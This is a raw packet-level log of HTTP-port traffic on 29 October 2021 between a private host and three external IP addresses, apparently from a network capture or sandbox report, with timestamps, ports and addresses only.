Oct 29, 2021 20:50:42.289617062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.289643049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.289661884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.289696932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.289738894 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.307331085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.307377100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.307400942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.307418108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.307435989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.307475090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.309993029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.310030937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.310053110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.310105085 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.310131073 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:43.349082947 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.415438890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.415788889 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.415836096 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.415842056 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.482023954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.482052088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.591753006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.600584984 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.600610971 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:43.667704105 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.667731047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.786339998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:43.946619987 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:44.002399921 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.089667082 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.089808941 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.090024948 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.176405907 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.379995108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.380026102 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.380134106 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.466540098 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.466643095 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.466661930 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.466732025 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.553772926 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.553802967 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.553816080 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.553916931 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.640388012 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.640532970 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.640549898 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.640567064 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.640583038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.640639067 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.640671968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.727788925 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728003025 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728004932 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.728035927 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728059053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728122950 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.728408098 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728437901 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728461027 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.728481054 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.728526115 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.814213991 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.814611912 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.814641953 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.814703941 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.815192938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815270901 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.815335035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815359116 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815381050 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815399885 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.815403938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815428019 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815449953 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.815450907 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815475941 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.815490961 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.902168036 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.902200937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.902225018 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.902328968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.902360916 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.902667046 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.902729034 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.902789116 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.902815104 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903068066 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903115988 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903141975 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903157949 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.903167963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903233051 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.903747082 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903774023 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903795004 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.903810978 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.903842926 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.904122114 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.904146910 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.904203892 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.990770102 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991204023 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991238117 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991256952 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991272926 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991291046 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991307974 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.991419077 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991445065 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.991452932 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.991616964 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991636038 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991652966 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.991667986 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.991692066 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992317915 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992345095 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992362022 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992417097 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992554903 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992573023 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992589951 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992602110 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992608070 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992636919 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992737055 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992757082 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992773056 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.992784977 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992821932 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.992986917 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.993227959 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.993247986 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.993274927 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:44.993339062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:44.993385077 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.077888966 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.077918053 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.077935934 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.077994108 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078008890 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.078011990 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078051090 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.078238010 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078254938 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078283072 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.078564882 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078624010 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.078798056 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078815937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078834057 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.078862906 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.078994989 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079040051 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.079277992 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079679966 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079699039 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079716921 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079735041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079751968 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.079792023 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.079864979 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079883099 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079900980 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.079915047 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.079947948 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.080034971 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080229998 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080248117 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080276012 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.080729961 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080749035 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080765963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080781937 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.080791950 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.080817938 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.081037998 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081056118 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081101894 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.081320047 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081388950 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.081478119 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081495047 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081545115 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.081722021 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081738949 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081785917 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.081917048 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081935883 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.081980944 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.164417982 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.164971113 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165014982 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165051937 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165055990 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165098906 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165108919 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165136099 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165174961 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165191889 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165215969 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165254116 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165258884 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165360928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165404081 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165446043 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165460110 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165537119 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.165926933 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.165971041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166012049 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166024923 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.166173935 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166213989 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166232109 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.166256905 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166296959 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166302919 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.166337013 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166384935 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.166565895 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166805983 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166845083 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.166857958 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.166997910 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167043924 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.167161942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167203903 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167251110 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.167445898 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167618036 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167659998 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167671919 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.167845011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167886019 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.167896986 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.168086052 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168128967 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168140888 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.168168068 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168206930 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168210030 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.168646097 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168689013 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168706894 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.168725967 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168778896 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.168833017 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168895960 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.168953896 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.169039011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169078112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169117928 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169123888 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.169331074 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169379950 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.169816971 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169858932 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.169902086 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.169903040 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.170089006 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.170142889 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.252029896 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252075911 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252111912 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252132893 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.252147913 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252192020 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.252216101 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252254963 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252302885 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.252338886 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252377033 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.252427101 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.253011942 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253051043 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253098011 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253102064 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.253438950 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253478050 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253493071 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.253515959 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253551960 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253559113 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.253928900 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.253971100 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254000902 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254014969 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254050016 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254086018 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254086971 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254122972 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254125118 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254394054 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254432917 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254442930 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254492998 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254544020 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254693031 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254905939 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.254966021 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.254981995 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255033970 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255081892 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.255445957 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255502939 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255551100 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.255667925 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255718946 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255768061 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.255770922 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255820036 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.255867004 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.256113052 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256175041 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256223917 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256233931 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.256272078 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256321907 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256328106 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.256367922 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.256414890 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.256673098 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257047892 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257105112 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257119894 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.257318974 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257370949 CEST	49867	80	192.168.2.4	31.166.224.38
Oct 29, 2021 20:50:45.257384062 CEST	80	49867	31.166.224.38	192.168.2.4
Oct 29, 2021 20:50:45.257438898 CEST	80	49867	31.166.224.38	192.168.2.4
